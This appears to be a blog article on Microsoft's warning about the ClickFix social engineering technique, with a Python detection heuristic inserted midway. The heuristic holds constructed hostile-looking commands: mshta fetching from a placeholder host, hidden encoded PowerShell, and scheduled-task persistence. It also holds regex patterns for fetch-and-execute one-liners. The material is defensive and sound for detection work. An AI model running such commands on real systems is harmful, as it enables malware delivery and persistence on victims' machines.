6 min read

Microsoft has sounded the alarm on ClickFix, a sophisticated social engineering method that convinces users to execute malicious commands themselves.
The campaign typically begins with a phishing lure or fake “fix this problem” page that tricks the user into running a command in Windows Run, Terminal, or PowerShell.
Because the user executes the payload, many security systems struggle to detect it.

ClickFix uses a human-interaction step: users are directed to copy-and-paste commands or click “Fix” in a prompt, which leads to code execution.
Once the command runs, actors often deliver infostealers, RATs, or loaders that are loaded into memory by living-off-the-land binaries, a fileless execution style, though some campaigns also write scripts or scheduled tasks to disk during later stages.
The method relies on user trust and everyday computing behaviors rather than brute force. Microsoft says ClickFix can slip past conventional automation and signature-based protections because the user initiates command execution.

Typical ClickFix campaigns begin with phishing emails, malvertising, compromised websites, or fake support dialogs. The victim receives a prompt like “Your system needs repair – click to fix” and is redirected to a page that instructs them to paste a command.
The commands are often loaded into the clipboard, making the process quick and seemingly benign. These lures are designed to bypass detection by appearing similar to legitimate support flows.

Once the user pastes and runs the command, the attacker’s code takes over, often using living-off-the-land binaries (LOLBins) like PowerShell, mshta.exe, or regasm.exe to load malicious code.
The final payloads observed include infostealers like Lumma Stealer, RATs (AsyncRAT, NetSupport), rootkits, and other tools. Because malware is loaded dynamically, detection based on fixed signatures is difficult.

Because the user initiates the command, traditional signature-based detection and automated filters are often bypassed. The interactions look like normal user behaviour (copy-paste, terminal launch). The malicious code may run in memory without writing files to disk.
This makes ClickFix especially challenging for endpoint protection and email filters. Microsoft’s research emphasises that prevention must include user behaviour and policy controls.

Initially more prevalent on Windows, ClickFix campaigns are now also seen targeting macOS, Android, and iOS where possible, for example by redirecting users to copy links or run scripts in Terminal on macOS, or via drive-by downloads on mobile.
As threat actors expand platforms, organisations must broaden their threat models beyond Windows workstations.

Microsoft identifies campaigns such as Storm-1865 (targeting hospitality) that used ClickFix to distribute credential-stealing malware via fake Booking.com prompts.
The campaigns span regions (North America, Europe, Southeast Asia) and industries (finance, education, transportation). Attackers impersonate trusted brands, mimic support flows, and exploit human behaviour.

ClickFix campaigns have primarily targeted sectors with high-value data: government, finance, education, critical infrastructure, hospitality, and transportation.
Staff in these sectors are often accustomed to taking shortcuts to get problems solved quickly, exactly the habit ClickFix exploits. High-value targets may require stricter controls and greater awareness.

ClickFix preys on human tendencies: when users believe something is broken or urgent, they follow instructions quickly. The prompt may say “Paste this command to fix your microphone” or “Verify you are human,” then instructs running a command.
The illusion of solving a problem is the hook. Training users to recognise that “fix this” prompts from unfamiliar sources may be malicious is essential.

Organisations should monitor for odd patterns: clipboard paste into PowerShell, invocation of mshta.exe or regasm.exe after a user-initiated terminal launch, new scheduled tasks created from unknown prompts, or browser flows that redirect to disguised CAPTCHA pages.
Microsoft recommends enabling logging (script-block, module), scrutinising Run dialog launches, and applying attack-surface-reduction rules.
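As an added illustration of the monitoring just described (example code written here, not Microsoft's detection rules), the following heuristic scores constructed process-creation events in Sysmon/4688 style for the ClickFix chain: a LOLBin launched interactively from explorer.exe or Windows Terminal, a command line that fetches, hides or decodes content, and a later scheduled-task creation by that interpreter. Field names, the sample events and the example.invalid URL are all constructed placeholders.

```python
# Added example: heuristic detection of a ClickFix-style execution chain over
# constructed process-creation events (Sysmon EventID 1 / Security 4688-like fields).
import re

# Interpreters and LOLBins the advisory names as ClickFix stage-two launchers.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "regasm.exe", "cmd.exe"}
# Parents that indicate a user-initiated launch (Run dialog, Start menu, terminal).
USER_SHELLS = {"explorer.exe", "windowsterminal.exe"}
# Traits of pasted one-liners: remote fetch, hidden window, encoded or evaluated content.
SUSPICIOUS = re.compile(
    r"(https?://|-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|\biex\b|invoke-expression|downloadstring)",
    re.I,
)

def base(image):
    """Strip the directory from a Windows image path and lower-case the file name."""
    return image.rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return the reasons an event looks like a user-pasted ClickFix command (empty = benign)."""
    reasons = []
    img, parent, cmd = base(ev["Image"]), base(ev["ParentImage"]), ev.get("CommandLine", "")
    if img in LOLBINS and parent in USER_SHELLS:
        reasons.append(f"{img} launched interactively from {parent}")
        if SUSPICIOUS.search(cmd):
            reasons.append("command line fetches, hides or decodes content")
    # Later ClickFix stages may persist via scheduled tasks created by the interpreter.
    if img == "schtasks.exe" and "/create" in cmd.lower() and parent in LOLBINS:
        reasons.append(f"scheduled task created by {parent}")
    return reasons

def detect(events):
    """Return (index, reasons) for every event that triggered at least one heuristic."""
    return [(i, r) for i, ev in enumerate(events) if (r := score_event(ev))]

# Constructed sample events; the URL and paths are placeholders, not real indicators.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://example.invalid/verify"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -w hidden -enc AAAA"},
    {"ParentImage": PS, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": "schtasks /create /tn Updater /tr C:\\Users\\Public\\u.vbs"},
    {"ParentImage": r"C:\Program Files\Vendor\installer.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c setup.bat"},  # installer-spawned, not interactive: no alert
]

if __name__ == "__main__":
    for idx, reasons in detect(SAMPLE_EVENTS):
        print(idx, "; ".join(reasons))
```

In production the same logic would run over EDR telemetry with the parent chain walked further back, since a terminal opened by the user may itself be the parent of the pasted interpreter.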

For individual users: never paste commands from unfamiliar websites or emails; type commands only when you know what they do.
Avoid launching Run or Terminal based on a website prompt. Keep OS and antivirus updates applied, enable reputation-based protection, disable macros, and use non-admin accounts for everyday work. Awareness is the first line of defence.

Enterprises should enforce least-privilege access (no local admin rights for normal users), enable attack-surface-reduction rules (block script execution and LOLBin abuse), enable PowerShell script-block and module logging, restrict Run/Terminal access where not needed, and monitor for unusual process execution.
Train staff about the ClickFix lures and ensure incident-response readiness.

Automated layers cannot catch everything when the user is the one running the command. Microsoft emphasises that behavioural training (recognising phishing, verifying requests, and avoiding “copy-paste fix” prompts) is all the more critical.
Regular simulated phishing exercises spotlight these types of threats. The human firewall remains a crucial part of defence.

Security policy must account for user-led execution attacks like ClickFix, with governance, auditing, and vendor tools (EDR/XDR) that detect more than just malware.
Defence in depth: identity, endpoint, network, data, and behaviour must all tie together. Vendors like Microsoft now provide detection rules specifically for ClickFix. Organisations should subscribe to threat intel and apply recommended rules.

ClickFix is still evolving: attackers are refining lures, expanding platforms, hiding via mobile and macOS, and using more subtle prompts.
The technique may become mainstream as human-interaction attacks yield high ROI. Defenders should assume the adversary may exploit any “help” or “fix” prompt in the future. Continuous awareness and adaptation are required.

The ClickFix trend highlights that even the best technical defences can be undermined by clever lures and user behaviour. Prevention includes policy, tooling, and training.
Users: never blindly paste commands. Organisations: monitor and restrict command execution, enforce least privilege, and apply new rules. Attackers rely on us to “help them” fix our system; don’t give them the tool.
Dan Mitchell has been in the computer industry for more than 25 years, getting started with computers at age 7 on an Apple II.